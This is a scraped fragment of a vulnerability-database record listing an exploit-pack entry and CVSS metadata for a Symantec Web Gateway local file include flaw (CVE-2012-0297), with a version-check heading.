[D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| Symantec Web Gateway 5.0.2 Local File Include Vulnerability \n**Notes**| \n", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "d2", "title": "DSquare Exploit Pack: D2SEC_SYMWEBGW", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2012-05-21T20:55:00", "id": "D2SEC_SYMWEBGW", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_symwebgw", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Symantec Web Gateway &lt; 5.0.3 Multiple Vulnerabilities (SYM12-006) (version check)

Description

Related

Symantec Web Gateway < 5.0.3 Multiple Vulnerabilities (SYM12-006) (version check)